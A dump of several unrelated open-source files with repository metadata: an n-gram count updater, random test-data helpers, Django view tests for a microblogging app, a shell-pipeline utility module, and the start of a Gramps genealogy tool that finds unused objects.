jiayisuse/cs73 | wp-admin/data_delete.py | 1 | 2483 | #!/usr/bin/env python
import nltk
import os
import sys
import include
title = sys.argv[1].lower()
html = sys.argv[2].lower()
cate_id = sys.argv[3]
def do_read_train(uni_dict, bi_dict, file):
lines = file.readlines()
for line in lines:
words = line.split()
bi_dict[words[0]] = int(words[2])
uni_dict[words[0].split("|")[1]] = int(words[4])
return int(lines[0].split()[-1])
def frequency_update(uni_dict, bi_dict, new_uni_dict, new_bi_dict):
# update uni dict
for token in new_uni_dict.keys():
if uni_dict.has_key(token):
uni_dict[token] -= new_uni_dict[token]
if uni_dict[token] == 0:
del uni_dict[token]
# update bi dict
for key in new_bi_dict:
if bi_dict.has_key(key):
bi_dict[key] -= new_bi_dict[key]
if bi_dict[key] == 0:
del bi_dict[key]
def sort_dict_to(uni_dict, bi_dict, n, sorted_list):
for key in bi_dict:
first = key.split("|")[0]
second = key.split("|")[1]
sorted_list.append([key, float(bi_dict[key]) / uni_dict[second], bi_dict[key], float(uni_dict[second]) / n, uni_dict[second], n])
	sorted_list.sort(key = lambda x: x[4], reverse = True)  # sort in place so the caller sees the ordering
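# --- Illustrative sketch (not part of the original script) ---
# The second column built in sort_dict_to() above is the bigram conditional
# probability P(w2 | w1) = count("w2|w1") / count(w1); toy counts shown below.
def _example_bigram_probability():
	uni = {"the": 10}
	bi = {"cat|the": 4}  # "cat" observed 4 times immediately after "the"
	return float(bi["cat|the"]) / uni["the"]  # 0.4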
text = nltk.clean_html(html)
cate_dir = os.path.join(include.dataset_dir, cate_id)
if not os.access(cate_dir, os.F_OK):
os.makedirs(cate_dir)
file = open(os.path.join(cate_dir, title + ".txt"), "w")
file.write(text)
file.close()
train_file = os.path.join(cate_dir, cate_id + include.bi_train_suffix)
uni_dict = {}
bi_dict = {}
n = 0
try:
with open(train_file, "r") as file:
n = do_read_train(uni_dict, bi_dict, file)
file.close()
except IOError:
pass
tokens = include.my_tokenizer(text)
if "" in tokens:
tokens.remove("")
# read unigram frequency from new post
num_tokens = len(tokens)
new_uni_dict = {}
for token in tokens:
if new_uni_dict.has_key(token):
new_uni_dict[token] += 1
else:
new_uni_dict[token] = 1
# read bigram frequency from new post
new_bi_dict = {}
for i in range(1, len(tokens)):
key = tokens[i] + "|" + tokens[i - 1]
if new_bi_dict.has_key(key):
new_bi_dict[key] += 1
else:
new_bi_dict[key] = 1
frequency_update(uni_dict, bi_dict, new_uni_dict, new_bi_dict)
sorted_list = []
sort_dict_to(uni_dict, bi_dict, n - num_tokens, sorted_list)
file = open(train_file, "w")
file.truncate()
for item in sorted_list:
token = item[0]
bi_p = item[1]
bi_freq = item[2]
uni_p = item[3]
uni_freq = item[4]
nn = item[5]
file.write("%-30s %.8f %6d %16.8f %6s %9d\n" %(token, bi_p, bi_freq, uni_p, uni_freq, nn))
file.close()
| gpl-2.0 | 659,474,404,455,746,600 | 24.864583 | 131 | 0.648409 | false |
att-comdev/deckhand | deckhand/tests/test_utils.py | 1 | 2701 | # Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import string
import uuid
def rand_uuid_hex():
"""Generate a random UUID hex string
:return: a random UUID (e.g. '0b98cf96d90447bda4b46f31aeb1508c')
:rtype: string
"""
return uuid.uuid4().hex
def rand_name(name='', prefix='deckhand'):
"""Generate a random name that includes a random number
:param str name: The name that you want to include
:param str prefix: The prefix that you want to include
:return: a random name. The format is
'<prefix>-<name>-<random number>'.
(e.g. 'prefixfoo-namebar-154876201')
:rtype: string
"""
randbits = str(random.randint(1, 0x7fffffff))
rand_name = randbits
if name:
rand_name = name + '-' + rand_name
if prefix:
rand_name = prefix + '-' + rand_name
return rand_name
def rand_bool():
"""Generate a random boolean value.
:return: a random boolean value.
:rtype: boolean
"""
return random.choice([True, False])
def rand_int(min, max):
"""Generate a random integer value between range (`min`, `max`).
:return: a random integer between the range(`min`, `max`).
:rtype: integer
"""
return random.randint(min, max)
def rand_password(length=15):
"""Generate a random password
:param int length: The length of password that you expect to set
           (If it's smaller than 3, it's the same as 3.)
:return: a random password. The format is
'<random upper letter>-<random number>-<random special character>
-<random ascii letters or digit characters or special symbols>'
(e.g. 'G2*ac8&lKFFgh%2')
:rtype: string
"""
upper = random.choice(string.ascii_uppercase)
ascii_char = string.ascii_letters
digits = string.digits
digit = random.choice(string.digits)
puncs = '~!@#%^&*_=+'
punc = random.choice(puncs)
seed = ascii_char + digits + puncs
pre = upper + digit + punc
password = pre + ''.join(random.choice(seed) for x in range(length - 3))
return password
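# Usage sketch (not part of the original module): the helpers above compose
# into ad-hoc test fixtures; every field name below is hypothetical.
def rand_document_fixture():
    return {
        'name': rand_name('doc'),  # e.g. 'deckhand-doc-154876201'
        'id': rand_uuid_hex(),
        'enabled': rand_bool(),
        'weight': rand_int(1, 100),
        'password': rand_password(),
    }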
| apache-2.0 | -8,100,752,528,894,591,000 | 30.406977 | 78 | 0.647908 | false |
jimpick/jaikuengine | actor/tests.py | 1 | 24011 | # -*- coding: utf-8 -*-
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import Cookie
import logging
import os
import urllib
from django.conf import settings
from django.core import mail
from common.tests import ViewTestCase
from common import api
from common import clean
from common import util
from common.test import util as test_util
class HistoryTest(ViewTestCase):
def test_public_history_when_signed_out(self):
r = self.login_and_get(None, '/user/popular')
self.assertContains(r, "Posts from popular")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertWellformed(r)
def test_private_history_when_signed_out(self):
r = self.login_and_get(None, '/user/girlfriend')
self.assertContains(r, 'private user')
# self.assert_error_contains(r, "Posts from girlfriend", 403)
def test_private_history_when_signed_in_as_contact(self):
r = self.login_and_get('boyfriend', '/user/girlfriend')
self.assertContains(r, "Posts from girlfriend")
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_private_history_when_signed_in_as_noncontact(self):
r = self.login_and_get('annoying', '/user/girlfriend')
self.assertContains(r, 'private user')
# self.assert_error_contains(r, "Posts from girlfriend", 403)
def test_public_history_when_signed_in_as_self(self):
r = self.login_and_get('popular', '/user/popular')
self.assertContains(r, "Your Posts")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertContains(r, 'entry_remove=', 3)
r = self.assertGetLink(r, 'confirm-delete', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular')
self.assertContains(r, 'entry_remove=', 2)
def test_private_history_when_signed_in_as_self(self):
r = self.login_and_get('celebrity', '/user/celebrity')
self.assertContains(r, "Your Posts")
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_wrong_case(self):
r = self.login_and_get(None, '/user/POPular')
self.assertContains(r, "Posts from popular")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertWellformed(r)
def set_presence(self, user, location):
params = {
'nick': '%[email protected]' % user,
'presence_set': '',
'location' : location,
'_nonce': util.create_nonce('%[email protected]' % user,
'presence_set')
}
return self.client.post('/user/popular', params)
def test_presence_self(self):
"""Tests setting and getting presence on the history page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular?flash')
self.assertContains(r, presence)
self.assertContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_presence_loggged_out(self):
# TODO(tyler): currently this doesn't really make you log in, it just
# doesn't save the update
presence = "This is the presence"
user = 'popular'
r = self.set_presence(user, presence)
self.assertNotContains(r, presence)
self.assertNotContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_presence_other(self):
"""Tests setting and getting presence on the history page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
# Retrieve for another user
r = self.login_and_get('unpopular', '/user/popular')
self.assertContains(r, presence)
self.assertTemplateUsed(r, 'actor/templates/history.html')
# Ensure we cannot save the presence
new_presence = 'This is the new presence'
r = self.set_presence(user, new_presence)
self.assertNotContains(r, new_presence)
self.assertNotContains(r, 'Location updated')
class SubscriptionTest(ViewTestCase):
def test_subscribe_and_unsubscribe(self):
r = self.login_and_get('popular', '/user/celebrity')
self.assertContains(r, 'class="subscribe', 2)
r = self.assertGetLink(r, 'subscribe', link_no = 0, of_count = 2)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/celebrity')
self.assertContains(r, 'class="subscribe', 1)
self.assertContains(r, 'class="unsubscribe', 1)
r = self.assertGetLink(r, 'unsubscribe', link_no = 0, of_count = 1)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/celebrity')
self.assertContains(r, 'class="subscribe', 2)
class OverviewTest(ViewTestCase):
def test_public_overview_when_signed_in_as_self(self):
r = self.login_and_get('popular', '/user/popular/overview')
self.assertContains(r, "Hi popular! Here's the latest from your contacts")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_public_overview_when_signed_out(self):
r = self.login_and_get(None, '/user/popular/overview')
# self.assert_error_contains(r, "Not allowed", 403)
def test_private_overview_when_signed_in_as_self(self):
r = self.login_and_get('celebrity', '/user/celebrity/overview')
self.assertContains(r, "Hi celebrity! Here's the latest from your contacts")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_private_overview_when_signed_out(self):
r = self.login_and_get(None, '/user/celebrity/overview')
# self.assert_error_contains(r, "Not allowed", 403)
def set_presence(self, user, location):
params = {
'nick': '%[email protected]' % user,
'presence_set': '',
'location' : location,
'_nonce': util.create_nonce('%[email protected]' % user,
'presence_set')
}
return self.client.post('/user/popular/overview', params)
def test_presence_self(self):
"""Tests setting and getting presence on the overview page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular/overview?flash')
self.assertContains(r, presence)
self.assertContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_presence_loggged_out(self):
# TODO(tyler): Logged out or another user sends the user to /user/<user>
presence = "This is the presence"
user = 'popular'
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular')
self.assertNotContains(r, presence)
self.assertNotContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_overview_with_unconfirmed_email(self):
r = self.login_and_get('hermit', '/user/hermit/overview')
self.assertContains(r, "not yet confirmed")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
class ItemTest(ViewTestCase):
def test_public_item_when_signed_out(self):
r = self.login_and_get(None, '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
# test mark as spam links
self.assertContains(r, 'mark_as_spam', 0)
# test delete links
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 0)
# test that all posts and comments have timestamps
self.assertContains(r, 'ago', 3)
def test_public_item_when_signed_in_as_poster(self):
r = self.login_and_get('popular', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 1)
self.assertContains(r, 'entry_remove=', 1)
self.assertContains(r, 'entry_remove_comment', 2)
def test_public_item_when_signed_in_as_commenter(self):
r = self.login_and_get('unpopular', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 2)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 1)
def test_public_item_when_signed_in_as_nonparticipant(self):
r = self.login_and_get('girlfriend', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 3)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 0)
def test_private_item_when_signed_out(self):
r = self.login_and_get(None, '/user/girlfriend/presence/16961')
# self.assert_error_contains(r, 'girlfriend', 403)
def test_private_item_when_signed_in_as_poster(self):
r = self.login_and_get('girlfriend', '/user/girlfriend/presence/16961')
self.assertContains(r, 'private test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 1)
self.assertContains(r, 'entry_remove=', 1)
self.assertContains(r, 'entry_remove_comment', 2)
# test that all posts and comments have timestamps
self.assertContains(r, 'ago', 3)
def test_private_item_when_signed_in_as_commenter(self):
r = self.login_and_get('boyfriend', '/user/girlfriend/presence/16961')
self.assertContains(r, 'private test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 2)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 1) # can only delete own comment
self.assertWellformed(r)
def test_entry_remove(self):
item_url = '/user/girlfriend/presence/16961'
r = self.login_and_get('girlfriend', item_url)
r = self.assertGetLink(r, 'confirm-delete', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get(item_url)
self.assertEqual(r.status_code, 404, r.content)
def test_entry_remove_comment(self):
item_url = '/user/girlfriend/presence/16961'
r = self.login_and_get('girlfriend', item_url)
r = self.assertGetLink(r, 'confirm-delete', link_no = 1, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get(item_url)
self.assertContains(r, 'entry_remove_comment', 1)
class CommentTest(ViewTestCase):
entry = 'stream/[email protected]/presence/12345'
def test_email_notification(self):
r = self.login('hermit')
content = 'TEST COMMENT'
params = {'entry_add_comment': '',
'nick': '[email protected]',
'stream': 'stream/[email protected]/presence',
'entry': self.entry,
'content': content,
'_nonce': util.create_nonce('[email protected]',
'entry_add_comment')
}
r = self.client.post('/user/popular/presence/12345',
params)
self.exhaust_queue_any()
self.assertEqual(len(mail.outbox), 2)
for email in mail.outbox:
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertContains(r, content)
self.assertTemplateUsed(r, 'actor/templates/item.html')
def test_email_notification_entities(self):
r = self.login('hermit')
content = 'TEST COMMENT single quote \' ç'
params = {'entry_add_comment': '',
'nick': '[email protected]',
'stream': 'stream/[email protected]/presence',
'entry': self.entry,
'content': content,
'_nonce': util.create_nonce('[email protected]',
'entry_add_comment')
}
r = self.client.post('/user/popular/presence/12345',
params)
self.exhaust_queue_any()
self.assertEqual(len(mail.outbox), 2)
for email in mail.outbox:
msg = email.message()
self.assertEqual(msg.get_charset(), 'utf-8')
      # the apostrophe must arrive literally, not HTML-escaped as &#39;
      self.assertEqual(-1, email.body.find('&#39;'))
class ContactsTest(ViewTestCase):
def test_contacts_when_signed_in(self):
r = self.login_and_get('popular', '/user/popular/contacts')
self.assertContains(r, 'Your contacts')
self.assertTemplateUsed(r, 'actor/templates/contacts.html')
self.assertContains(r, 'class="remove', 2)
r = self.assertGetLink(r, 'remove', link_no = 0, of_count = 2)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular/contacts')
self.assertContains(r, 'class="remove', 1)
def test_followers_when_signed_in(self):
r = self.login_and_get('popular', '/user/popular/followers')
self.assertContains(r, 'Your followers')
self.assertTemplateUsed(r, 'actor/templates/followers.html')
self.assertContains(r, 'class="add', 3)
r = self.assertGetLink(r, 'add', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular/contacts')
self.assertContains(r, 'class="remove', 3)
def test_invite_friends_link_presence(self):
r = self.client.get('/user/popular/contacts')
self.assertNotContains(r, 'Invite friends')
r = self.login_and_get('popular', '/user/popular/contacts')
self.assertContains(r, 'Invite friends')
self.logout()
r = self.client.get('/user/popular/contacts')
self.assertNotContains(r, 'Invite friends')
def test_email_notification(self):
# new follower
r = self.login('hermit')
params = {'actor_add_contact': '',
'owner': '[email protected]',
'target': '[email protected]',
'_nonce': util.create_nonce('[email protected]',
'actor_add_contact')
}
r = self.client.post('/user/popular', params)
self.assertEqual(len(mail.outbox), 1, 'new follower')
email = mail.outbox[0]
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertTemplateUsed(r, 'actor/templates/history.html')
mail.outbox = []
# new follower mutual
r = self.login('popular')
params = {'actor_add_contact': '',
'owner': '[email protected]',
'target': '[email protected]',
'_nonce': util.create_nonce('[email protected]',
'actor_add_contact')
}
r = self.client.post('/user/unpopular', params)
self.assertEqual(len(mail.outbox), 1, 'new follower mutual')
email = mail.outbox[0]
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertTemplateUsed(r, 'actor/templates/history.html')
class SettingsTest(ViewTestCase):
def test_settings_404(self):
r = self.login_and_get('popular', '/user/popular/settings/NonExist')
self.assertContains(r, 'Page not found', status_code=404)
def test_settings_index(self):
r = self.login_and_get('popular', '/user/popular/settings')
self.assertContains(r, 'Settings')
self.assertTemplateUsed(r, 'actor/templates/settings_index.html')
def test_settings_profile(self):
r = self.login_and_get('popular', '/user/popular/settings/profile')
self.assertContains(r, 'Profile')
self.assertTemplateUsed(r, 'actor/templates/settings_profile.html')
def test_settings_mobile(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/mobile')
self.assertContains(r, 'Mobile')
self.assertTemplateUsed(r, 'actor/templates/settings_mobile.html')
def test_settings_email(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/email')
self.assertContains(r, 'Email')
self.assertTemplateUsed(r, 'actor/templates/settings_email.html')
def test_settings_im(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/im')
self.assertContains(r, 'IM')
self.assertTemplateUsed(r, 'actor/templates/settings_im.html')
def test_settings_password(self):
r = self.login_and_get('popular', '/user/popular/settings/password')
self.assertContains(r, 'Change Your Password')
self.assertTemplateUsed(r, 'actor/templates/settings_password.html')
def test_settings_photo(self):
r = self.login_and_get('popular', '/user/popular/settings/photo')
self.assertContains(r, 'Your photo')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
def test_settings_delete(self):
r = self.login_and_get(
'popular',
'/user/popular/settings/delete',
{
'_nonce' : util.create_nonce('popular', 'actor_remove'),
'actor_remove' : '',
'nick' : 'popular',
},
)
r = self.assertRedirectsPrefix(r, '/logout')
# TODO(tyler): Add a test that the user cannot log back in!
def test_settings_upload_avatar(self):
nick = 'obligated'
self.login(nick)
nick = clean.nick(nick)
old_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick)
contacts = api.actor_get_contacts(api.ROOT, nick)
self.assertEquals(len(old_contact_avatars), len(contacts) + 1)
old_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
start_time = api.utcnow()
no_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick,
since_time=start_time)
self.assertEquals(len(no_contact_avatars), 0)
# TODO(teemu): add more tests for different file types (gif and jpg).
# Alternatively, test those against api.avatar_upload.
f = open('testdata/test_avatar.jpg')
r = self.client.post('/user/obligated/settings/photo',
{
'imgfile': f,
'_nonce' :
util.create_nonce('obligated', 'change_photo'),
})
r = self.assertRedirectsPrefix(r, '/user/obligated/settings/photo')
actor_ref = api.actor_get(api.ROOT, nick)
new_avatar = actor_ref.extra.get('icon', 'avatar_default')
self.assertNotEquals(old_avatar, new_avatar)
self.assertTrue(actor_ref.avatar_updated_at >= start_time)
new_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick,
since_time=start_time)
self.assertEquals(len(new_contact_avatars), 1)
self.assertEquals(new_contact_avatars.pop().nick, nick)
self.assertContains(r, 'Avatar uploaded')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_settings_change_avatar(self):
nick = 'obligated'
self.login(nick)
nick = clean.nick(nick)
old_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
# TODO(teemu): add more tests for different file types (gif and jpg).
# Alternatively, test those against api.avatar_upload.
r = self.client.post('/user/obligated/settings/photo',
{
'avatar': 'default/animal_9',
'_nonce' :
util.create_nonce('obligated', 'change_photo'),
})
r = self.assertRedirectsPrefix(r, '/user/obligated/settings/photo')
new_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
self.assertNotEquals(old_avatar, new_avatar)
self.assertContains(r, 'Avatar changed')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_settings_privacy(self):
r = self.login_and_get('popular', '/user/popular/settings/privacy')
self.assertContains(r, 'Privacy')
self.assertTemplateUsed(r, 'actor/templates/settings_privacy.html')
def test_settings_design(self):
r = self.login_and_get('popular', '/user/popular/settings/design')
self.assertContains(r, 'Change Design')
self.assertTemplateUsed(r, 'actor/templates/settings_design.html')
def test_settings_badge(self):
r = self.login_and_get('popular', '/user/popular/settings/badge')
self.assertContains(r, 'badge')
self.assertTemplateUsed(r, 'actor/templates/settings_badge.html')
def test_settings_notifications(self):
r = self.login_and_get('popular', '/user/popular/settings/notifications')
self.assertContains(r, 'notifications')
self.assertTemplateUsed(r, 'actor/templates/settings_notifications.html')
def test_settings_webfeeds(self):
r = self.login_and_get('popular', '/user/popular/settings/feeds')
self.assertContains(r, 'feeds')
self.assertTemplateUsed(r, 'actor/templates/settings_feeds.html')
class NewUserTest(ViewTestCase):
def test_pages_as_newuser(self):
api.user_create(api.ROOT, nick = 'mmmm', password = 'mmmmmm',
first_name = 'm',
last_name ='m')
for page in ('/user/root',
'/user/mmmm/overview',
'/user/mmmm/contacts',
'/user/mmmm/followers',
'/user/mmmm',
'/channel/popular',
'/channel/popular/presence/13345'):
r = self.login_and_get('mmmm', page, password='mmmmmm')
self.assertEqual(r.status_code, 200, page + ' failed:' +
str(r.status_code))
class PostTest(ViewTestCase):
def test_post_message_in_overview(self):
self.login('popular')
msg = 'a post from unit test'
r = self.client.post('/user/popular/overview',
{'message': msg,
'_nonce': util.create_nonce('popular', 'post'),
'nick': '[email protected]',
'post': '',
})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertContains(r, msg)
self.assertContains(r, 'a moment ago')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_post_message_in_personal_history(self):
self.login('popular')
msg = 'a post from unit test'
r = self.client.post('/user/popular',
{'message': msg,
'_nonce': util.create_nonce('popular', 'post'),
'nick': '[email protected]',
'post': '',
})
r = self.assertRedirectsPrefix(r, '/user/popular')
self.assertContains(r, msg)
self.assertContains(r, 'a moment ago')
self.assertTemplateUsed(r, 'actor/templates/history.html')
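# Sketch (not part of the original suite) of the request convention every
# POST above follows: an empty action flag, the acting nick, and a '_nonce'
# derived from (nick, action); `fields` carries the action's own
# hypothetical parameters.
def make_action_params(nick, action, **fields):
  params = {action: '', 'nick': nick,
            '_nonce': util.create_nonce(nick, action)}
  params.update(fields)
  return params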
| apache-2.0 | -7,610,653,294,364,199,000 | 39.694915 | 85 | 0.643815 | false |
thebjorn/dkcoverage | dkcoverage/shell.py | 1 | 4111 | # -*- coding: utf-8 -*-
"""Utility functions for shell-like programming::
for line in run('cat foo') | grep('hello'):
print line
New 'commands' only need to have a feed(lines) method that should return
a Lines instance.
"""
# pylint:disable=R0903,R0201
# R0903: Too few public methods
# R0201: method could be a function
import re
import shlex
import pprint
from subprocess import Popen, PIPE
def runcmd(cmd, *args):
"helper function to grab output of a shell command."
if args:
cmd = cmd + ' ' + ' '.join(args)
output = Popen(shlex.split(cmd), stdout=PIPE).communicate()[0]
return output.splitlines()
def _grep(pattern, lines):
"return the lines that match pattern."
return [line for line in lines if re.search(pattern, line)]
def extract_line(pattern, lines):
"return first line that matches pattern."
return _grep(pattern, lines)[0]
def _split(lines):
"Split each line into columns."
return [line.split() for line in lines]
def _field(n, lines):
"Return the nth column."
return [cols[n] for cols in _split(lines)]
class Lines(object):
"Pipe contents."
def __init__(self, lines):
self.lines = lines
def __nonzero__(self):
return bool(self.lines)
def __len__(self):
return len(self.lines)
def __repr__(self):
return pprint.pformat(self.lines)
__str__ = __repr__
def __iter__(self):
return iter(self.lines)
def __or__(self, nextcmd):
return nextcmd.feed(self.lines)
def __getitem__(self, key):
return self.lines[key]
def run(cmd, *args, **kw):
"Convenience function to get runcmd output into pipeable format."
    if kw.get('verbose'):
        print cmd,
        if args:
            print args
        else:
            print
return Lines(runcmd(cmd, *args))
class Sort(object):
"similar to unix sort command."
def feed(self, lines):
"sort lines"
return Lines(sorted(lines))
sort = Sort()
class grep(object):
"similar to unix grep command."
def __init__(self, pattern):
self.pattern = pattern
def feed(self, lines):
"get input from pipe"
return Lines([line for line in lines if re.search(self.pattern, line)])
class grepv(object):
"similar to unix `grep -v` command (return lines that don't match."
def __init__(self, pattern):
self.pattern = pattern
def feed(self, lines):
"get input from pipe"
return Lines([line for line in lines
if not re.search(self.pattern, line)])
class fn(object):
"call function on each line."
def __init__(self, function):
self.defun = function
def feed(self, lines):
"get input from pipe"
return Lines([self.defun(line) for line in lines])
class PrintLines(object):
"Print lines."
def feed(self, lines): # pylint:disable=R0201
"Print lines."
for line in lines:
print line
return len(lines)
# aliases
cat = PrintLines()
printlines = PrintLines()
class Split(object):
"""Split input lines into columns, optionally specify token to split on.
Normally used through the `split' object.
"""
def __init__(self, token=None):
self.token = token
def feed(self, lines):
"get input from pipe"
return Lines([line.split(self.token) for line in lines])
split = Split()
class field(object):
"Extract column #n."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return Lines([cols[self.n] for cols in _split(lines)])
class lineno(object):
"Extract line #n."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return lines[self.n]
first = lineno(0)
second = lineno(1)
last = lineno(-1)
class head(object):
"Extract first n lines."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return Lines(lines[:self.n])
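# Example of the extension point described in the module docstring (not
# part of the original file): any object exposing feed(lines) -> Lines
# plugs straight into a pipe, e.g. run('cat foo') | strip | printlines.
class Strip(object):
    "Strip surrounding whitespace from each line."
    def feed(self, lines):
        "get input from pipe"
        return Lines([line.strip() for line in lines])
strip = Strip()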
| gpl-2.0 | 7,848,778,357,293,426,000 | 19.555 | 79 | 0.600097 | false |
Forage/Gramps | gramps/plugins/tool/removeunused.py | 1 | 18449 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2008 Stephane Charette
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"Find unused objects and remove with the user's permission."
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
from __future__ import with_statement
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".RemoveUnused")
#-------------------------------------------------------------------------
#
# gtk modules
#
#-------------------------------------------------------------------------
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GObject
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from gramps.gen.db import DbTxn
from gramps.gen.errors import WindowActiveError
from gramps.gui.managedwindow import ManagedWindow
from gramps.gen.datehandler import displayer as _dd
from gramps.gen.updatecallback import UpdateCallback
from gramps.gui.plug import tool
from gramps.gui.glade import Glade
#-------------------------------------------------------------------------
#
# runTool
#
#-------------------------------------------------------------------------
class RemoveUnused(tool.Tool, ManagedWindow, UpdateCallback):
MARK_COL = 0
OBJ_ID_COL = 1
OBJ_NAME_COL = 2
OBJ_TYPE_COL = 3
OBJ_HANDLE_COL = 4
def __init__(self, dbstate, uistate, options_class, name, callback=None):
self.title = _('Unused Objects')
tool.Tool.__init__(self, dbstate, options_class, name)
if self.db.readonly:
return
ManagedWindow.__init__(self, uistate,[], self.__class__)
UpdateCallback.__init__(self, self.uistate.pulse_progressbar)
self.dbstate = dbstate
self.uistate = uistate
self.tables = {
'events' : {'get_func': self.db.get_event_from_handle,
'remove' : self.db.remove_event,
'get_text': self.get_event_text,
'editor' : 'EditEvent',
'stock' : 'gramps-event',
'name_ix' : 4},
'sources' : {'get_func': self.db.get_source_from_handle,
'remove' : self.db.remove_source,
'get_text': None,
'editor' : 'EditSource',
'stock' : 'gramps-source',
'name_ix' : 2},
